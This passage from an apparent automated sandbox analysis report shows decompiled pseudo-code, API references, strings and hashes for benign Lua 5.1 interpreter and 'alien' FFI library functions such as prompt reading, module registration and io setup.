						_push(0xffffd8f0);
						_push(_t33);
						 *(_t34 + 0x3c) = _t19;
						L00A23F02();
						_push(0xfffffffe);
						_push(_t33);
						L00A23F1A();
						_t13 = _t34 + 0x10; // 0x10
						_t26 = _t13;
						_t21 = E00A24400(_t13, 1,  *((intOrPtr*)(_t34 + 0x2c)),  *((intOrPtr*)(_t34 + 0x28)),  *((intOrPtr*)(_t34 + 0x34)));
						_t39 = _t37 + 0x38;
						if(_t21 != 0) {
							_push("alien: cannot create callback");
							_push(_t33);
							L00A23F26();
							_t39 = _t39 + 8;
						}
						_t27 = _v4;
						_t22 = E00A24310( *_t27, _t26, E00A214C0, _t34);
						 *(_t34 + 4) =  *_t27;
						 *_t34 = 0;
						 *((intOrPtr*)(_t34 + 8)) = 0;
						if(_t22 != 0) {
							_push("alien: cannot create callback");
							_push(_t33);
							L00A23F26();
						}
						return 1;
					}
				}
			}

0x00a21995
0x00a21999
0x00a2199b
0x00a2199d
0x00a2199e
0x00a219a5
0x00a219ab
0x00a219ad
0x00a219ae
0x00a219b0
0x00a219b7
0x00a219bc
0x00a219be
0x00a219c2
0x00a21ac9
0x00a21ac9
0x00a21ace
0x00a21acf
0x00a21ade
0x00a219c8
0x00a219ca
0x00a21ac0
0x00a21ac6
0x00000000
0x00a219d0
0x00a219d0
0x00a219d7
0x00a219eb
0x00a219ed
0x00a219d9
0x00a219d9
0x00a219de
0x00a219e5
0x00000000
0x00a219e7
0x00a219e7
0x00a219e7
0x00a219e5
0x00a219f5
0x00a219f7
0x00a219fa
0x00a21a00
0x00a21a05
0x00a21a06
0x00a21a0b
0x00a21a0b
0x00a21a0e
0x00a21a10
0x00a21a11
0x00a21a14
0x00a21a1b
0x00a21a22
0x00a21a25
0x00a21a28
0x00a21a2b
0x00a21a30
0x00a21a35
0x00a21a36
0x00a21a3b
0x00a21a40
0x00a21a45
0x00a21a46
0x00a21a49
0x00a21a4e
0x00a21a50
0x00a21a51
0x00a21a62
0x00a21a62
0x00a21a68
0x00a21a6d
0x00a21a72
0x00a21a74
0x00a21a79
0x00a21a7a
0x00a21a7f
0x00a21a7f
0x00a21a89
0x00a21a90
0x00a21a9c
0x00a21a9f
0x00a21aa1
0x00a21aa4
0x00a21aa6
0x00a21aab
0x00a21aac
0x00a21ab1
0x00a21abe
0x00a21abe
0x00a219ca

APIs

luaL_checktype.LUA5.1(?,00000001,00000006), ref: 00A2199E
malloc.MSVCR80 ref: 00A219A5
lua_newuserdata.LUA5.1(?,00000004), ref: 00A219B0
free.MSVCR80(00000000), ref: 00A219FA
luaL_error.LUA5.1(?,alien: cannot allocate callback), ref: 00A21A06
lua_pushvalue.LUA5.1(?), ref: 00A21A2B
luaL_ref.LUA5.1(?,FFFFD8F0), ref: 00A21A36
lua_getfield.LUA5.1(?,FFFFD8F0,alien_callback,?,FFFFD8F0), ref: 00A21A49
lua_setmetatable.LUA5.1(?,000000FE,?,FFFFD8F0,alien_callback,?,FFFFD8F0), ref: 00A21A51
luaL_error.LUA5.1(?,alien: cannot create callback,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00A21A7A
luaL_error.LUA5.1(?,alien: cannot create callback), ref: 00A21AAC

Part of subcall function 00A21000: GetSystemInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A219DE), ref: 00A21011
Part of subcall function 00A21000: VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00A2104B

free.MSVCR80(00000000), ref: 00A21AC0
luaL_error.LUA5.1(?,alien: cannot allocate callback), ref: 00A21ACF

Strings

alien: cannot create callback, xrefs: 00A21A74, 00A21AA6
alien_callback, xrefs: 00A21A3B
alien: cannot allocate callback, xrefs: 00A21A00, 00A21AC9

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: L_error.$free$AllocInfoL_checktype.L_ref.SystemVirtuallua_getfield.lua_newuserdata.lua_pushvalue.lua_setmetatable.malloc
String ID: alien: cannot allocate callback$alien: cannot create callback$alien_callback
API String ID: 1262428043-650184571
Opcode ID: 39f63d3eb9eb1d7a967dff403a3cb735a91164ac501f793e584cf4662a1af663
Instruction ID: 488f122534bce0db22d9575d184571f8c8edecc4075d3ca6d9729f8428f7099c
Opcode Fuzzy Hash: 39f63d3eb9eb1d7a967dff403a3cb735a91164ac501f793e584cf4662a1af663
Instruction Fuzzy Hash: E63139B2A04324BFC620AF6DBDC2E3BB3F4BF55B00B40493DF50696640D7B4B9418661

Uniqueness

Uniqueness Score: -1.00%

Function 100158A0, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E100158A0(void* __eflags, void* __fp0) {
				intOrPtr __ebx;
				void* __esi;
				signed int _t15;
				void* _t19;
				void* _t24;
				void* _t25;

				_t22 =  *((intOrPtr*)( *((intOrPtr*)(_t24 + 0xc)) + 8));
				_t15 = E10001410(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t24 + 0xc)) + 8)), 3) + 0xfffffffd;
				_t25 = _t24 + 8;
				if(_t15 > 3) {
					return E1000F090(_t19, _t22, __eflags, _t22, 3, "string/function/table expected");
				} else {
					switch( *((intOrPtr*)(_t15 * 4 +  &M100159B4))) {
						case 0:
							return E100159D0(_t29, __fp0, _t23,  *((intOrPtr*)(_t25 + 0x18)),  *((intOrPtr*)(_t25 + 0x1c)),  *((intOrPtr*)(_t25 + 0x20)));
							goto L11;
						case 1:
							__edi =  *((intOrPtr*)(__esp + 0x20));
							__ebx =  *((intOrPtr*)(__esp + 0x1c));
							E10015550(__fp0, __ebp, 0, __ebx, __edi) = E10001B60(__eflags, __esi, 3);
							goto L5;
						case 2:
							__eax = E100013D0(__eflags, __esi, 3);
							__edi =  *((intOrPtr*)(__esp + 0x28));
							__ebx =  *((intOrPtr*)(__esp + 0x24));
							E100154F0(__ebp, __fp0, __ebp, __ebx, __edi) = E10002070(__esi, __eax, 1);
							L5:
							__eflags = E100016C0(__eflags, __esi, 0xffffffff);
							if(__eflags != 0) {
								__eflags = E100014D0(__eflags, __esi, 0xffffffff);
								if(__eflags == 0) {
									_push(E10001410(__eflags, __esi, 0xffffffff));
									E10001440(__esi) = E1000F230(__esi, "invalid replacement value (a %s)", __eax);
								}
								__eax =  *((intOrPtr*)(__esp + 0x18));
								return E1000FB70(__esi, __eflags,  *((intOrPtr*)(__esp + 0x18)));
							} else {
								__eax = E10001160(__esi, 0xfffffffe);
								__eflags = __edi;
								E10001930(__esi, __ebx, __edi) =  *((intOrPtr*)(__esp + 0x2c));
								return E1000FB70(__esi, __eflags,  *((intOrPtr*)(__esp + 0x2c)));
							}
							goto L11;
					}
				}
				L11:
			}

0x100158aa
0x100158b3
0x100158b6
0x100158bc
0x100159b2
0x100158c2
0x100158c2
0x00000000
0x100158e5
0x00000000
0x00000000
0x1001590c
0x10015910
0x10015921
0x00000000
0x00000000
0x100158e9
0x100158ee
0x100158f2
0x10015902
0x10015929
0x10015934
0x10015936
0x1001596a
0x1001596c
0x10015976
0x10015984
0x10015989
0x1001598c
0x1001599d
0x10015938
0x1001593b
0x10015940
0x1001594a
0x1001595e
0x1001595e
0x00000000
0x00000000
0x100158c2
0x00000000

APIs

lua_type.LUA5.1(?,00000003,00000000,00000000,00000001,?,100157F6,?,?,00000000,00000000,?,00000000,00000000), ref: 100158AE
lua_pushvalue.LUA5.1(?,00000003), ref: 100158E9
lua_call.LUA5.1(?,00000000,00000001,?,?,?,?,00000003), ref: 10015902
lua_gettable.LUA5.1(?,00000003,?,00000000,?,?,00000000,00000000,?,00000000,00000000), ref: 10015921
lua_toboolean.LUA5.1(?,000000FF,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000), ref: 1001592C
lua_settop.LUA5.1(?,000000FE,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1001593B
lua_pushlstring.LUA5.1(?,?,?,?,000000FE), ref: 10015945
luaL_addvalue.LUA5.1(?), ref: 10015952
lua_isstring.LUA5.1(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 10015962
lua_type.LUA5.1(?,000000FF), ref: 10015971
lua_typename.LUA5.1(?,00000000,?,000000FF), ref: 10015978
luaL_error.LUA5.1(?,invalid replacement value (a %s),00000000,?,00000000,?,000000FF), ref: 10015984
luaL_addvalue.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 10015991
luaL_argerror.LUA5.1(?,00000003,string/function/table expected,00000000,00000000,?,00000000,00000000), ref: 100159A6

Strings

invalid replacement value (a %s), xrefs: 1001597E
string/function/table expected, xrefs: 1001599E

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_addvalue.lua_type.$L_argerror.L_error.lua_call.lua_gettable.lua_isstring.lua_pushlstring.lua_pushvalue.lua_settop.lua_toboolean.lua_typename.
String ID: invalid replacement value (a %s)$string/function/table expected
API String ID: 4076345672-3477047044
Opcode ID: 0fdc4632bd342165a31564f14d17309dfb2be0676e4d11f8897f9b28433bf282
Instruction ID: de6ce9efab76cea4113e15e19c734ea8231c41c5a6043627c27fc2074ecc54d7
Opcode Fuzzy Hash: 0fdc4632bd342165a31564f14d17309dfb2be0676e4d11f8897f9b28433bf282
Instruction Fuzzy Hash: 9921B9AE605214BBE100E655BC42EEF735CCFC62FAF180225FA145A287E726BB5141F7

Uniqueness

Uniqueness Score: -1.00%

Function 1000F710, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000F710(signed int __ecx, void* __fp0, intOrPtr _a4, signed int _a8, intOrPtr* _a12, signed int _a16) {
				intOrPtr _t16;
				signed int _t19;
				void* _t23;
				void* _t28;
				signed int _t32;
				signed int _t33;
				intOrPtr* _t41;
				intOrPtr _t42;
				signed int _t43;
				signed int _t45;
				void* _t46;
				void* _t48;
				void* _t49;

				_t33 = __ecx;
				_t32 = _a16;
				_t43 = _a8;
				_t42 = _a4;
				_t41 = _a12;
				_t50 = _t43;
				if(_t43 != 0) {
					_a8 = E1000F820(_t41);
					E1000F900(_t33, _t50, __fp0, _t42, 0xffffd8f0, "_LOADED", _t20);
					E10001B90(_t33, _t50, _t42, 0xffffffff, _t43);
					_t23 = E10001410(_t50, _t42, 0xffffffff);
					_t48 = _t46 + 0x28;
					_t51 = _t23 - 5;
					if(_t23 != 5) {
						E10001160(_t42, 0xfffffffe);
						_t28 = E1000F900(_t33, _t51, __fp0, _t42, 0xffffd8ee, _t43, _a8);
						_t49 = _t48 + 0x18;
						_t52 = _t28;
						if(_t28 != 0) {
							E1000F230(_t42, "name conflict for module \'%s\'", _t43);
							_t49 = _t49 + 0xc;
						}
						E100013D0(_t52, _t42, 0xffffffff);
						E10001DD0(_t33, _t52, _t42, 0xfffffffd, _t43);
						_t48 = _t49 + 0x14;
					}
					E100011B0(_t52, _t42, 0xfffffffe);
					E100012B0((_t33 | 0xffffffff) - _t32, _t42, (_t33 | 0xffffffff) - _t32);
					_t46 = _t48 + 0x10;
				}
				if( *_t41 != 0) {
					do {
						_t55 = _t32;
						if(_t32 > 0) {
							_a8 = _t32;
							_t45 =  ~_t32;
							do {
								E100013D0(_t55, _t42, _t45);
								_t46 = _t46 + 8;
								_t19 = _a8 - 1;
								_t56 = _t19;
								_a8 = _t19;
							} while (_t19 != 0);
						}
						_t38 =  *(_t41 + 4);
						E10001A20(_t42,  *(_t41 + 4), _t32);
						E10001DD0(0xfffffffe - _t32, _t56, _t42, 0xfffffffe,  *_t41);
						_t16 =  *((intOrPtr*)(_t41 + 8));
						_t41 = _t41 + 8;
						_t46 = _t46 + 0x18;
					} while (_t16 != 0);
				}
				return E10001160(_t42, (_t38 | 0xffffffff) - _t32);
			}

0x1000f710
0x1000f711
0x1000f716
0x1000f71b
0x1000f720
0x1000f724
0x1000f726
0x1000f73e
0x1000f742
0x1000f74b
0x1000f753
0x1000f758
0x1000f75b
0x1000f75e
0x1000f763
0x1000f774
0x1000f779
0x1000f77c
0x1000f77e
0x1000f787
0x1000f78c
0x1000f78c
0x1000f792
0x1000f79b
0x1000f7a0
0x1000f7a0
0x1000f7a6
0x1000f7b2
0x1000f7b7
0x1000f7b7
0x1000f7bd
0x1000f7bf
0x1000f7bf
0x1000f7c1
0x1000f7c5
0x1000f7c9
0x1000f7cb
0x1000f7cd
0x1000f7d6
0x1000f7d9
0x1000f7d9
0x1000f7da
0x1000f7da
0x1000f7cb
0x1000f7e0
0x1000f7e6
0x1000f7f7
0x1000f7fc
0x1000f7ff
0x1000f802
0x1000f805
0x1000f7bf
0x1000f81c

APIs

luaL_findtable.LUA5.1(?,FFFFD8F0,_LOADED,00000000,?,?,?,?,?,1000F706,?,?,?,00000000), ref: 1000F742

Part of subcall function 1000F900: lua_pushvalue.LUA5.1(?,?,?,?,?,?,1000F747,?,FFFFD8F0,_LOADED,00000000,?), ref: 1000F90E
Part of subcall function 1000F900: strchr.MSVCRT ref: 1000F91D
Part of subcall function 1000F900: lua_pushlstring.LUA5.1(?,?,00000000), ref: 1000F941
Part of subcall function 1000F900: lua_rawget.LUA5.1(?,000000FE,?,?,00000000), ref: 1000F949
Part of subcall function 1000F900: lua_type.LUA5.1(?,000000FF,?,000000FE,?,?,00000000), ref: 1000F951
Part of subcall function 1000F900: lua_settop.LUA5.1(?,000000FE), ref: 1000F960
Part of subcall function 1000F900: lua_createtable.LUA5.1(?,00000000,00000001), ref: 1000F97B
Part of subcall function 1000F900: lua_pushlstring.LUA5.1(?,00000001,?,?,00000000,00000001), ref: 1000F983
Part of subcall function 1000F900: lua_pushvalue.LUA5.1(?,000000FE,?,00000001,?,?,00000000,00000001), ref: 1000F98B
Part of subcall function 1000F900: lua_settable.LUA5.1(?,000000FC,?,000000FE,?,00000001,?,?,00000000,00000001), ref: 1000F993
Part of subcall function 1000F900: lua_type.LUA5.1(?,000000FF), ref: 1000F9A0
Part of subcall function 1000F900: lua_remove.LUA5.1(?,000000FE), ref: 1000F9B0
Part of subcall function 1000F900: lua_settop.LUA5.1(?,000000FD), ref: 1000F9C9

lua_getfield.LUA5.1(?,000000FF,?,?,FFFFD8F0,_LOADED,00000000,?,?,?,?,?,1000F706,?,?,?), ref: 1000F74B

Part of subcall function 10001B90: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001BBA

lua_type.LUA5.1(?,000000FF,?,000000FF,?,?,FFFFD8F0,_LOADED,00000000,?,?,?,?,?,1000F706,?), ref: 1000F753
lua_settop.LUA5.1(?,000000FE), ref: 1000F763
luaL_findtable.LUA5.1(?,FFFFD8EE,?,?,?,000000FE), ref: 1000F774
luaL_error.LUA5.1(?,name conflict for module '%s',?), ref: 1000F787

Part of subcall function 1000F230: luaL_where.LUA5.1(?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F238
Part of subcall function 1000F230: lua_pushvfstring.LUA5.1(?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F248
Part of subcall function 1000F230: lua_concat.LUA5.1(?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F250
Part of subcall function 1000F230: lua_error.LUA5.1(?,?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F256

lua_pushvalue.LUA5.1(?,000000FF), ref: 1000F792
lua_setfield.LUA5.1(?,000000FD,?,?,000000FF), ref: 1000F79B
lua_remove.LUA5.1(?,000000FE), ref: 1000F7A6
lua_insert.LUA5.1(?,?,?,000000FE), ref: 1000F7B2
lua_pushvalue.LUA5.1(?,?,?,?,?,?,1000F706,?,?,?,00000000), ref: 1000F7CD
lua_pushcclosure.LUA5.1(?,?,?,?,?,?,?,1000F706,?,?,?,00000000), ref: 1000F7E6
lua_setfield.LUA5.1(?,FFFFFFFE,00000000,?,?,?,?,?,?,?,1000F706,?,?,?,00000000), ref: 1000F7F7
lua_settop.LUA5.1(?,?,?,?,?,?,1000F706,?,?,?,00000000), ref: 1000F810

Strings

name conflict for module '%s', xrefs: 1000F781
_LOADED, xrefs: 1000F733

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushvalue.lua_settop.$lua_type.$L_findtable.lua_pushlstring.lua_remove.lua_setfield.$L_error.L_where.S_newlstr.lua_concat.lua_createtable.lua_error.lua_getfield.lua_insert.lua_pushcclosure.lua_pushvfstring.lua_rawget.lua_settable.strchr
String ID: _LOADED$name conflict for module '%s'
API String ID: 2806790568-445948674
Opcode ID: d1e5e3bef4b2cdf7c4e44a7d0d6e6fc99f5adbddf68e586533cfb31dec72a467
Instruction ID: a3e79225ca518ab43f4c1c935315a2e20b41c37f2a781278450a66a55a4194d3
Opcode Fuzzy Hash: d1e5e3bef4b2cdf7c4e44a7d0d6e6fc99f5adbddf68e586533cfb31dec72a467
Instruction Fuzzy Hash: 492107755096193BB201DA299C82DBF729CEF862F8F10032CF534526DAEB25BA1142F7

Uniqueness

Uniqueness Score: -1.00%

Function 00401480, Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00401480(void* __ebx, void* __edx, void* __ebp, intOrPtr _a4) {
				signed int _v4;
				char _v515;
				char _v516;
				void* __edi;
				void* __esi;
				char* _t17;
				char* _t26;
				intOrPtr* _t27;
				void* _t28;
				char* _t31;
				void* _t33;
				char _t34;
				void* _t40;
				intOrPtr* _t43;
				void* _t44;
				char* _t46;
				void* _t47;
				intOrPtr _t49;
				signed int _t50;
				void* _t51;
				signed int _t52;
				signed int _t53;

				_t40 = __edx;
				_t33 = __ebx;
				_t50 =  &_v516;
				_v4 =  *0x404000 ^ _t50;
				_t49 = _a4;
				_t17 = "_PROMPT";
				if(_t49 == 0) {
					_t17 = "_PROMPT2";
				}
				_push(_t17);
				_push(0xffffd8ee);
				_push(_t33);
				L00401EE2();
				_push(0);
				_push(0xffffffff);
				_push(_t33);
				L00401F36();
				_t46 = _t17;
				_t51 = _t50 + 0x18;
				if(_t46 == 0) {
					_t46 = "> ";
					if(_t49 == 0) {
						_t46 = ">> ";
					}
				}
				L00401F0C();
				_t43 = __imp____iob_func;
				fputs(_t46,  *_t43() + 0x20);
				fflush( *_t43() + 0x20);
				_t26 = fgets( &_v516, 0x200,  *_t43());
				_t52 = _t51 + 0x20;
				_t44 = _t33;
				_t47 = 0xfffffffe;
				if(_t26 != 0) {
					_t27 =  &_v516;
					_t41 = _t27 + 1;
					do {
						_t34 =  *_t27;
						_t27 = _t27 + 1;
					} while (_t34 != 0);
					_t28 = _t27 - _t41;
					if(_t28 != 0) {
						_t31 = _t52 + _t28 + 3;
						if( *((char*)(_t52 + _t28 + 3)) == 0xa) {
							 *_t31 = _t34;
						}
					}
					if(_t49 == 0 || _v516 != 0x3d) {
						_t41 =  &_v516;
						_push( &_v516);
						_push(_t33);
						L00401ED0();
						_t53 = _t52 + 8;
					} else {
						_push( &_v515);
						_push("return %s");
						_push(_t33);
						L00401EF4();
						_t53 = _t52 + 0xc;
					}
					return E00401F90(1, _t33, _v4 ^ _t53, _t41, _t44, _t47);
				} else {
					return E00401F90(_t26, _t33, _v4 ^ _t52, _t40, _t44, _t47);
				}
			}

0x00401480
0x00401480
0x00401480
0x0040148d
0x00401495
0x0040149e
0x004014a3
0x004014a5
0x004014a5
0x004014ac
0x004014ad
0x004014b2
0x004014b3
0x004014b8
0x004014ba
0x004014bc
0x004014bd
0x004014c2
0x004014c4
0x004014c9
0x004014cd
0x004014d2
0x004014d4
0x004014d4
0x004014d2
0x004014dc
0x004014e1
0x004014ee
0x004014fa
0x0040150d
0x00401513
0x00401518
0x00401519
0x0040151a
0x00401532
0x00401536
0x00401540
0x00401540
0x00401542
0x00401545
0x00401549
0x0040154b
0x00401552
0x00401556
0x00401558
0x00401558
0x00401556
0x0040155c
0x0040157a
0x0040157e
0x0040157f
0x00401580
0x00401585
0x00401565
0x00401569
0x0040156a
0x0040156f
0x00401570
0x00401575
0x00401575
0x004015a2
0x0040151d
0x00401531
0x00401531

APIs

lua_getfield.LUA5.1(?,FFFFD8EE,_PROMPT), ref: 004014B3
lua_tolstring.LUA5.1(?,000000FF,00000000,?,FFFFD8EE,_PROMPT), ref: 004014BD
lua_settop.LUA5.1(?,000000FE), ref: 004014DC
__iob_func.MSVCR80 ref: 004014E7
fputs.MSVCR80 ref: 004014EE
__iob_func.MSVCR80 ref: 004014F4
fflush.MSVCR80 ref: 004014FA
__iob_func.MSVCR80 ref: 00401500
fgets.MSVCR80 ref: 0040150D
lua_pushfstring.LUA5.1(?,return %s,?), ref: 00401570
lua_pushstring.LUA5.1(?,?), ref: 00401580

Strings

_PROMPT2, xrefs: 004014A5, 004014AC
_PROMPT, xrefs: 0040149E
=, xrefs: 0040155E
>> , xrefs: 004014D4, 004014ED
return %s, xrefs: 0040156A

Memory Dump Source

Source File: 00000003.00000002.481771819.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.481676145.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481875011.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481973747.0000000000405000.00000002.00020000.sdmp Download File

Similarity

API ID: __iob_func$fflushfgetsfputslua_getfield.lua_pushfstring.lua_pushstring.lua_settop.lua_tolstring.
String ID: =$>> $_PROMPT$_PROMPT2$return %s
API String ID: 3175113386-2928876284
Opcode ID: 5344250e0b051589115bd2dd5b5b1b2b27d7a3c3babdf594b4ffe2c124147d58
Instruction ID: 959a952ad845eae1764fa3c05ff63733f52954b4d29f44eac24731e78619b4a4
Opcode Fuzzy Hash: 5344250e0b051589115bd2dd5b5b1b2b27d7a3c3babdf594b4ffe2c124147d58
Instruction Fuzzy Hash: 823138714043047BD730AB29DC49B6F779C9B80318F44853AF806BB2E2EA3C9904868A

Uniqueness

Uniqueness Score: -1.00%

Function 00401DD0, Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E00401DD0(intOrPtr __eax, char* _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				void* _v12;
				char* _t7;
				intOrPtr _t11;
				char* _t23;
				intOrPtr _t25;
				intOrPtr* _t26;
				void* _t28;
				void* _t30;

				L00401F3C();
				_t25 = __eax;
				if(__eax != 0) {
					_t7 = _a4;
					_push( &_v12);
					_push(E00401C20);
					_push(__eax);
					_v12 = _t7;
					_v8 = __eax;
					L00401F6C();
					_t23 = _t7;
					_t28 =  &_v12 + 0xc;
					if(_t23 != 0) {
						_push(0xffffffff);
						_push(__eax);
						L00401F4E();
						_t28 = _t28 + 8;
						if(_t7 != 0) {
							_push(0);
							_push(0xffffffff);
							_push(__eax);
							L00401F36();
							_t30 = _t28 + 0xc;
							if(_t7 == 0) {
								_t7 = "(error object is not a string)";
							}
							E00401060(_t7);
							_push(0xfffffffe);
							_push(_t25);
							L00401F0C();
							_t28 = _t30 + 0xc;
						}
					}
					_push(_t25);
					L00401EE8();
					if(_t23 != 0 || _v4 != _t23) {
						goto L4;
					} else {
						return 0;
					}
				} else {
					_t11 =  *((intOrPtr*)(__eax));
					_t26 = __imp____iob_func;
					if(_t11 != 0) {
						fprintf( *_t26(_t11) + 0x40, "%s: ");
					}
					fprintf( *_t26("cannot create state: not enough memory") + 0x40, "%s\n");
					fflush( *_t26() + 0x40);
					L4:
					return 1;
				}
			}

0x00401dd7
0x00401ddc
0x00401de0
0x00401e31
0x00401e39
0x00401e3a
0x00401e3f
0x00401e40
0x00401e44
0x00401e48
0x00401e4d
0x00401e4f
0x00401e54
0x00401e56
0x00401e58
0x00401e59
0x00401e5e
0x00401e63
0x00401e65
0x00401e67
0x00401e69
0x00401e6a
0x00401e6f
0x00401e74
0x00401e76
0x00401e76
0x00401e81
0x00401e86
0x00401e88
0x00401e89
0x00401e8e
0x00401e8e
0x00401e63
0x00401e91
0x00401e92
0x00401e9c
0x00000000
0x00401ea5
0x00401eab
0x00401eab
0x00401de2
0x00401de2
0x00401dec
0x00401df2
0x00401e00
0x00401e02
0x00401e15
0x00401e1d
0x00401e27
0x00401e30
0x00401e30

APIs

luaL_newstate.LUA5.1 ref: 00401DD7
__iob_func.MSVCR80 ref: 00401DFA
fprintf.MSVCR80 ref: 00401E00
__iob_func.MSVCR80 ref: 00401E0F
fprintf.MSVCR80 ref: 00401E15
__iob_func.MSVCR80 ref: 00401E17
fflush.MSVCR80 ref: 00401E1D
lua_cpcall.LUA5.1(00000000,Function_00001C20,?), ref: 00401E48
lua_type.LUA5.1(00000000,000000FF), ref: 00401E59
lua_tolstring.LUA5.1(00000000,000000FF,00000000), ref: 00401E6A
lua_settop.LUA5.1(00000000,000000FE,00000000), ref: 00401E89
lua_close.LUA5.1(00000000), ref: 00401E92

Strings

(error object is not a string), xrefs: 00401E76, 00401E7B
cannot create state: not enough memory, xrefs: 00401E05
%s, xrefs: 00401E0A
%s: , xrefs: 00401DF5

Memory Dump Source

Source File: 00000003.00000002.481771819.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.481676145.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481875011.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481973747.0000000000405000.00000002.00020000.sdmp Download File

Similarity

API ID: __iob_func$fprintf$L_newstate.fflushlua_close.lua_cpcall.lua_settop.lua_tolstring.lua_type.
String ID: %s$%s: $(error object is not a string)$cannot create state: not enough memory
API String ID: 3039381710-2652681213
Opcode ID: 0d294e8007b782c5f260f875d05d25547fc49c7e0d1c8dd097b4ce241c2839a2
Instruction ID: 3bd24dc7c7c46126b39836e4fd7d205d4c9ffb2ce3e97a16e61930a815e145ca
Opcode Fuzzy Hash: 0d294e8007b782c5f260f875d05d25547fc49c7e0d1c8dd097b4ce241c2839a2
Instruction Fuzzy Hash: 1A11B47290021227D711EB299C42B5F3A985E80364F14023BFC58F23E1FB3CEA0945DE

Uniqueness

Uniqueness Score: -1.00%

Function 10012BB0, Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10012BB0(void* __ecx, void* __eflags, intOrPtr _a4) {

				_t24 = _a4;
				E10012D10(__ecx, __eflags, _a4);
				E10001C70(_t24, 2, 1);
				E10001300(_t24, 0xffffd8ef);
				E1000F6F0(_t24, "io", 0x10017718);
				E10012D50(_t24, __imp___iob, 1, "stdin");
				_t21 = __imp___iob + 0x20;
				E10012D50(_t24, __imp___iob + 0x20, 2, "stdout");
				_t23 = __imp___iob + 0x40;
				_t30 = __imp___iob + 0x40;
				E10012D50(_t24, _t23, 0, "stderr");
				E10001B90(__imp___iob + 0x20, __imp___iob + 0x40, _t24, 0xffffffff, "popen");
				E10001C70(_t24, 0, 1);
				E10001A20(_t24, E10012C90, 0);
				E10001DD0(_t21, __imp___iob + 0x40, _t24, 0xfffffffe, "__close");
				E10001FE0(_t30, _t24, 0xfffffffe);
				E10001160(_t24, 0xfffffffe);
				E10001A20(_t24, E10012CD0, 0);
				E10001DD0(_t21, _t30, _t24, 0xffffd8ef, "__close");
				return 1;
			}

0x10012bb1
0x10012bb6
0x10012bc0
0x10012bcb
0x10012bdb
0x10012bee
0x10012bfe
0x10012c05
0x10012c13
0x10012c13
0x10012c1f
0x10012c2c
0x10012c36
0x10012c43
0x10012c50
0x10012c5b
0x10012c63
0x10012c70
0x10012c80
0x10012c8e

APIs

Part of subcall function 10012D10: luaL_newmetatable.LUA5.1(?,FILE*,?,10012BBB,?), ref: 10012D1B
Part of subcall function 10012D10: lua_pushvalue.LUA5.1(?,000000FF,?,FILE*,?,10012BBB,?), ref: 10012D23
Part of subcall function 10012D10: lua_setfield.LUA5.1(?,000000FE,__index,?,000000FF,?,FILE*,?,10012BBB,?), ref: 10012D30
Part of subcall function 10012D10: luaL_register.LUA5.1(?,00000000,10017778,?,000000FE,__index,?,000000FF,?,FILE*,?,10012BBB,?), ref: 10012D3D

lua_createtable.LUA5.1(?,00000002,00000001,?), ref: 10012BC0
lua_replace.LUA5.1(?,FFFFD8EF,?,00000002,00000001,?), ref: 10012BCB
luaL_register.LUA5.1(?,1001A2F0,10017718,?,FFFFD8EF,?,00000002,00000001,?), ref: 10012BDB

